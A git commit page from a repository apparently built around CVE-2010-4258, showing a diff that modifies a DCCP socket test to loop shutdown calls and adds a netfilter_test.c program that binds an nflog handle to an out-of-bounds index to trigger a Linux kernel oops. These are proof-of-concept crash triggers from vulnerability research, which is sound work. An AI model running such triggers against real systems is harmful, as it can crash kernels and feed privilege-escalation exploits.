diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-03-09 19:35:19 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-03-09 19:35:19 -0500 |
commit | 48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97 (patch) | |
tree | 4366892d0ba7c1a8e4b7eeaf8269e34638c56dbd | |
parent | Usleep (diff) | |
download | CVE-2010-4258-48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97.tar.xz CVE-2010-4258-48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97.zip |
Add netfilter oops test.
-rw-r--r-- | dccp_test.c | 22 | ||||
-rw-r--r-- | netfilter_test.c | 23 |
2 files changed, 36 insertions, 9 deletions
diff --git a/dccp_test.c b/dccp_test.c index 786f869..6c60d7c 100644 --- a/dccp_test.c +++ b/dccp_test.c @@ -11,7 +11,7 @@ int main() memset(&laddr, 0, sizeof(laddr)); laddr.sin_family = AF_INET; laddr.sin_addr.s_addr = inet_addr("127.0.0.1"); - laddr.sin_port = htons(31337); + laddr.sin_port = htons(31347); if (fork()) { int listener = socket(PF_INET, SOCK_DCCP, IPPROTO_DCCP); if (listener < 0) { @@ -43,10 +43,12 @@ int main() perror(NULL); return -1; } - if (close(client) < 0) { - printf("[-] Could not close connection.\n"); - perror(NULL); - return -1; + for (;;) { + if (shutdown(client, SHUT_RDWR) < 0) { + //printf("[-] Could not close connection.\n"); + perror(NULL); + //return -1; + } } } else { usleep(100); @@ -67,10 +69,12 @@ int main() perror(NULL); return -1; } - if (close(hello) < 0) { - printf("[-] Could not close connection.\n"); - perror(NULL); - return -1; + for (;;) { + if (shutdown(hello, SHUT_RDWR) < 0) { + //printf("[-] Could not close connection.\n"); + perror(NULL); + //return -1; + } } } diff --git a/netfilter_test.c b/netfilter_test.c new file mode 100644 index 0000000..fbd56d4 --- /dev/null +++ b/netfilter_test.c @@ -0,0 +1,23 @@ +#include <stdio.h> +#include <netinet/in.h> +#include <libnetfilter_log/libnetfilter_log.h> + +int main(int argc, char *argv[]) +{ + struct nflog_handle *h; + h = nflog_open(); + if (!h) { + printf("[-] Could not open netfilter log.\n"); + return -1; + } + printf("[+] Unbinding handle.\n"); + nflog_unbind_pf(h, AF_INET); + printf("[+] Binding handle to out of bounds index.\n"); + nflog_bind_pf(h, -22); /* expects >= 0? */ + printf("[+] Unbinding handle, now bound to out of bounds index.\n"); + nflog_unbind_pf(h, AF_INET); + printf("[+] Closing handle.\n"); + nflog_close(h); + printf("[-] Did not trigger oops.\n"); + return 0; +} |